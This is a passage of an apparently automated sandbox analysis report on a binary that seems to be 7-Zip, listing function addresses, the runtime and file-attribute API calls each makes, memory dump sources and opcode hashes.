Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C11
Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C19
Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79C3B

Part of subcall function 00B79BCC: free.MSVCRT ref: 00B79D2A

wcscmp.MSVCRT ref: 00B79E66
free.MSVCRT ref: 00B79ECA
free.MSVCRT ref: 00B79ED4
free.MSVCRT ref: 00B79F13
free.MSVCRT ref: 00B79F1B
free.MSVCRT ref: 00B79F28
free.MSVCRT ref: 00B79F49
free.MSVCRT ref: 00B79F51

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmovewcscmp
String ID:
API String ID: 3584677832-0
Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
Instruction ID: 34f53c2445bf127a1eaa4cbfc7f1958dc509be46d14affc930aa8fea8cb29c13
Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
Instruction Fuzzy Hash: C941E623306A4091CA10EF16E88026FA7E1F786BE9F4452A1EF6D5B764DF38C95EC700

Function 00B92ECC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B92F7E
fputs.MSVCRT ref: 00B92F9D
free.MSVCRT ref: 00B92FB6
free.MSVCRT ref: 00B92FC1

Part of subcall function 00B52C78: free.MSVCRT ref: 00B52CAE

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

free.MSVCRT ref: 00B92FCC

Strings

= , xrefs: 00B92F96

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputs
String ID: =
API String ID: 2444650769-2525689732
Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction ID: 13fc48593121f31f0fb56f105ad3f451ae4d906eb67ea5a12432489335b0d27b
Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction Fuzzy Hash: 18215E2371994091CE20EB15E49136EA7B0E7D6BE1F4452B2FF5E43B69DF28C949CB00

Function 00B9E16E Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00B9E1C2
__setusermatherr.MSVCRT ref: 00B9E211
_initterm.MSVCRT ref: 00B9E225
__getmainargs.MSVCRT ref: 00B9E256
_initterm.MSVCRT ref: 00B9E26A
_cexit.MSVCRT ref: 00B9E29D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction ID: aa64820219b7fd8d420ce0f35f0f1f3e1e70d744b2b6a6478bac6fa93339d625
Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction Fuzzy Hash: 6F31FA71218B46DBEB40DF65E89036A7BA1F784B64F504235E76A837A4DF7CC849CB04

Function 00B9E1A6 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00B9E1C2
__setusermatherr.MSVCRT ref: 00B9E211
_initterm.MSVCRT ref: 00B9E225
__getmainargs.MSVCRT ref: 00B9E256
_initterm.MSVCRT ref: 00B9E26A
_cexit.MSVCRT ref: 00B9E29D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44

Function 00B9E139 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00B9E1C2
__setusermatherr.MSVCRT ref: 00B9E211
_initterm.MSVCRT ref: 00B9E225
__getmainargs.MSVCRT ref: 00B9E256
_initterm.MSVCRT ref: 00B9E26A
_cexit.MSVCRT ref: 00B9E29D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44

Function 00B9E15A Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00B9E1C2
__setusermatherr.MSVCRT ref: 00B9E211
_initterm.MSVCRT ref: 00B9E225
__getmainargs.MSVCRT ref: 00B9E256
_initterm.MSVCRT ref: 00B9E26A
_cexit.MSVCRT ref: 00B9E29D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 1be9c4c3821ee94135277cd03da61307b86320fed779c7e051f58d5a49e17200
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 59210C71218B42D7EB00DF28E89036A7BA1F784774F505225E66A837B4DF7CC849CB44

Function 00B74610 Relevance: 8.8, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00B83EE0: free.MSVCRT ref: 00B83F45

free.MSVCRT ref: 00B74633
free.MSVCRT ref: 00B7463C
free.MSVCRT ref: 00B74646
free.MSVCRT ref: 00B74672
free.MSVCRT ref: 00B7467A
free.MSVCRT ref: 00B74687
free.MSVCRT ref: 00B746BA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction ID: 67fd58869e2bbf4b33d8e871c9847eef281abd371b384df5b7ee124fee59021b
Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction Fuzzy Hash: D5115423742E4496CA24BF72D95122A73A0EB53BB271882F1DF3D27795DF64D8668700

Function 00B7419C Relevance: 8.8, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B741B9
free.MSVCRT ref: 00B741C5
free.MSVCRT ref: 00B741D1
free.MSVCRT ref: 00B741DD
free.MSVCRT ref: 00B741E6
free.MSVCRT ref: 00B741EF
free.MSVCRT ref: 00B741F8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction ID: 3cc4be2a592a7393eb647b4679555d63e53061a63b31feea26aa979971732cb3
Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction Fuzzy Hash: FC11A522312A4085CF14EF75C8A122D73A0FB82F9AB1446A1AF7E5B765CF24C85A8744

Function 00B83A42 Relevance: 7.7, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B83C0C
free.MSVCRT ref: 00B83C17
free.MSVCRT ref: 00B83C22
free.MSVCRT ref: 00B83C77
free.MSVCRT ref: 00B83C82

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction ID: 9d5bcac550bb3208cf690d917cd1a6dcf4f8123043cbe24b6612a3dc218c8ed1
Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction Fuzzy Hash: 1A514C63201A4491CB10EF35D49079E77A1F785FC4F9080A2EE4E97729DF78CA8ACB41

Function 00B91544 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B915D5

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

Testing archive: , xrefs: 00B915C0
Extracting archive: , xrefs: 00B915C7
Open, xrefs: 00B91604

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$memset
String ID: Extracting archive: $Open$Testing archive:
API String ID: 3543874852-295398807
Opcode ID: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
Instruction ID: 86f6dadff8f7b75fd4866f634ca55f48def43fd3fc3ee3d11c26e4c81608ceb6
Opcode Fuzzy Hash: 57ce32b18a297629e4857599c7fb9a690bf538672504f27dd934718ea67813a2
Instruction Fuzzy Hash: A311912274268384DF55DB29D9443EC33A0E756B98F5D84B69E0D4A365EF78C48AD310

Function 00B92E24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B92E47
fputs.MSVCRT ref: 00B92E57
free.MSVCRT ref: 00B92EA4

Part of subcall function 00B92CFC: fputs.MSVCRT ref: 00B92D41
Part of subcall function 00B92CFC: fputs.MSVCRT ref: 00B92DCF
Part of subcall function 00B92CFC: free.MSVCRT ref: 00B92DFF

Strings

= , xrefs: 00B92E50

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free
String ID: =
API String ID: 3873070119-2525689732
Opcode ID: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
Instruction ID: 77296061615d56c71f242f4bcfb5147c48f9089917a417d527478e129408bd0f
Opcode Fuzzy Hash: 5f170de45124cbf05d2114cb4ce541d5ab7e7f6622d8dac823fc30cd2b14e81d
Instruction Fuzzy Hash: 7CF0AE5270590091DD20E726E99137E6361E7C6FF5F0493A1AE6E477E8DF2CC549C701

Function 00B849B0 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B84A5C
free.MSVCRT ref: 00B84A67
free.MSVCRT ref: 00B84AE4

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B84B0F
free.MSVCRT ref: 00B84B1A

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
Instruction ID: fadc569ffc074e8c7b1d1fb9e607b64f4b361d0a2079b39083b4b6ffa8289664
Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
Instruction Fuzzy Hash: 2F418B23205B8591CB24EF25D4903AE67E1FB86B85F4810B2EF8E4B728DF38C599C314

Function 00B9E120 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction ID: 85fb20e16bd2e7b5b69cac631b9b708d95f3a514b2a2dcdb061a0fb75a151128
Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction Fuzzy Hash: 6131FB72214B46C6EB10DF28E89036A7BB0F784B65F504225E6A9437F4DB7CC885CB54

Function 00B52320 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5237E
free.MSVCRT ref: 00B523AB
fputs.MSVCRT ref: 00B523B8
free.MSVCRT ref: 00B523C4

Part of subcall function 00B53274: memmove.MSVCRT ref: 00B532AC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputsmemmove
String ID:
API String ID: 4106585527-0
Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction ID: f8370ea3786f53814c8ee2221fff8f75b34ce0e958104096cb8e823a901603c6
Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction Fuzzy Hash: D601A92330984091CE20AB25E85135E7761E7C6BF5F0453A1BE6F977F8DE28C58ACB04

Function 00B568A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE ref: 00B568C7
SetFileAttributesW.KERNEL32 ref: 00B56903
free.MSVCRT ref: 00B56913
free.MSVCRT ref: 00B56921

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction ID: 20b246ac0c26e1c8558bea7954f65b872e17d06971c00be4ccf8d86fc61d0fd4
Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction Fuzzy Hash: EA01A72230461181D6309B21D58037E17E4DB8A7F6F5803E19E69977A4CE24CD8E9751

Function 00B57D4C Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00B57D6E
GetFileAttributesW.KERNEL32 ref: 00B57DA5
free.MSVCRT ref: 00B57DB2
free.MSVCRT ref: 00B57DC0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction ID: dd7e9c85ef665bdbd187357cef7f5c07816a7ac72bbe8e16d52baa2a3c6459e6
Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction Fuzzy Hash: F7F03166348A0181CA20AB35E99437D22B4DB8A7F6F5403F0EF79967E5DF18C98E8700

Function 00B73E14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B73F66
memmove.MSVCRT ref: 00B73F8B
free.MSVCRT ref: 00B74028
free.MSVCRT ref: 00B74033

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction ID: f77feefc68a6f5569a393a24e17ee85d08959fc0c666eb4be996ff8ac00336a9
Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction Fuzzy Hash: 35519E72705A8097CA30DB16E88029DB3A0F789FD4F408266EF9E47B19DF38C5A5CB50

Function 00B79BCC Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B79C11
free.MSVCRT ref: 00B79C19
free.MSVCRT ref: 00B79C3B
free.MSVCRT ref: 00B79D2A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
Instruction ID: c14f39bca7d7d2be42562bc93b77141a4d2b3e0d4224ccb36c4951b94234c11b
Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
Instruction Fuzzy Hash: 8831E2237156808ACF30DF25E48052EA7E1F7897A0B58C2B5EF6E47758DB38C885CB00

Function 00B7A9FC Relevance: 5.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7AA95
free.MSVCRT ref: 00B7AAB8
free.MSVCRT ref: 00B7AAC5
free.MSVCRT ref: 00B7AAD2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction ID: 5537e3677c1b790328dd016faff2d70a7e576ebed463e6ae1821b91b7029d515
Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction Fuzzy Hash: 6711532230994051DA50EB25E5913AE97A0EBD17F1F5052E1BEBE87AF9DE18C94ECB00

Function 00B7CF80 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

free.MSVCRT ref: 00B7CFC9
_CxxThrowException.MSVCRT ref: 00B7CFE6
free.MSVCRT ref: 00B7D019
free.MSVCRT ref: 00B7D021

Memory Dump Source

